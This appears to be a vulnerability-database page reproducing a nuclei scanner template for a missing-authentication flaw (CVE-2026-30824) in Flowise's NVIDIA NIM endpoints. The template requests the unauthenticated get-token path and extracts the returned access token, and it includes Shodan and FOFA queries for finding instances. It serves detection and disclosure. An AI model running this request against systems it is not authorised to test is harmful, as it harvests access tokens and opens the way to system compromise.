Lucene search
K

Flowise - NVIDIA NIM Endpoints Missing Authentication

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Flowise before v3.0.13 exposes NVIDIA NIM endpoints without auth, enabling token access.

Related
Refs
Code
id: CVE-2026-30824

info:
  name: Flowise - NVIDIA NIM Endpoints Missing Authentication
  author: DhiyaneshDk
  severity: high
  description: |
    Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.
  impact: |
    Unauthenticated attackers can access privileged container management and token generation, potentially leading to full system compromise.
  remediation: This issue has been patched in version 3.0.13
  reference:
    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454
    - https://nvd.nist.gov/vuln/detail/CVE-2026-30824
    - https://github.com/FlowiseAI/Flowise
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-30824
    epss-score: 0.3625
    epss-percentile: 0.98289
    cwe-id: CWE-306
  metadata:
    max-request: 2
    vendor: flowiseai
    product: flowise
    shodan-query: title:"Flowise"
    fofa-query: title="Flowise"
  tags: cve,cve2026,flowise,nvidia,nim,unauth,auth-bypass,token-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/nvidia-nim/get-token"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'access_token','token_type')"
        condition: and

    extractors:
      - type: regex
        name: access_token
        group: 1
        regex:
          - '"access_token"\s*:\s*"([^"]+)"'
        part: body
# digest: 4a0a00473045022002fc6985b0c836d377cf177227d0c17bc9126a8bd77f842dc3cf5664c143f09a022100e982b087e8d2c4c1aa05aaf1f8f21fe51cb8793d981e51b0cc0a49a97528cfce:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2026 07:09Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
CVSS 47.7
EPSS0.3625
SSVC
12